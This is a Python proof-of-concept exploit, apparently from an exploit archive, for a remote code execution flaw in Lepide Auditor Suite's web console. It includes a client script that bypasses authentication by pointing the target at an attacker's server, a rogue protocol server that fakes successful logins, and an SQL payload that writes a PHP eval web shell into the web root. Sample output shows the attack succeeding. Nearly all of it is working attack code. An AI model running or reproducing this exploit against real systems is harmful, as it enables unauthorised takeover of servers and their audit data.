1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195 | #!/usr/bin/python
"""
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/
Summary:
========
The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.
Additional code:
================
When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:
root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys
if len(sys.argv) < 3:
print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
sys.exit(-1)
target = sys.argv[1]
server = sys.argv[2]
s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'})
Example:
========
root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016
(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();
In another console:
root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""
import struct
import socket
from thread import start_new_thread
import struct
LOGIN = 601
COLUMN = 604
FILENAME = 603
VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"
def get_string(conn):
size = struct.unpack(">i", conn.recv(4))[0]
data = conn.recv(size).decode("utf-16")
conn.send(struct.pack(">i", VALID))
return data
def send_string(conn, string):
size = len(string.encode("utf-16-le"))
conn.send(struct.pack(">i", size))
conn.send(string.encode("utf-16-le"))
return struct.unpack(">i", conn.recv(4))[0]
def send_tag(conn, tag):
conn.send(struct.pack(">i", TAGR))
conn.send(struct.pack(">i", tag))
return struct.unpack(">i", conn.recv(4))[0]
def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print "(+) successfully sent tag"
# send length of file
conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))
# send the malicious payload
conn.send(filedata.encode("utf-16-le"))
if struct.unpack(">i", conn.recv(4))[0] == 2:
print "(+) successfully sent file!"
if send_tag(conn, VALID) == 2:
return True
return False
def client_thread(conn):
"""
Let's put it this way, my mum's not proud of my code.
"""
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(">i", data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(">i", code)[0]
# stage 1
if resp == LOGIN:
print "(+) got a login request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
# now we expect to get the username and password
print "(+) got a username: %s" % get_string(conn)
print "(+) got a password: %s" % get_string(conn)
# now we try to send to send a success packet
print "(+) sending SUCCESS packet"
if send_string(conn, SUCCESS) == 2:
print "(+) send string successful"
# stage 2
elif resp == COLUMN:
print "(+) got a column request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
if send_string(conn, "foo-bar") == 2:
print "(+) send string successful"
# stage 3 - this is where the exploitation is
elif resp == FILENAME:
print "(+) got a filename request"
conn.send(struct.pack(">i", VALID))
# now we read back 3 strings...
print "(+) got http request daterange: %s" % get_string(conn)
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
# exploit!
if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
print "(+) file sent successfully"
print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
break
conn.close()
HOST = '0.0.0.0'
PORT = 1056
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)
print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."
while True:
# blocking call, waits to accept a connection
conn, addr = s.accept()
print '(+) connected by %s' % addr
start_new_thread(client_thread, (conn,))
s.close()
|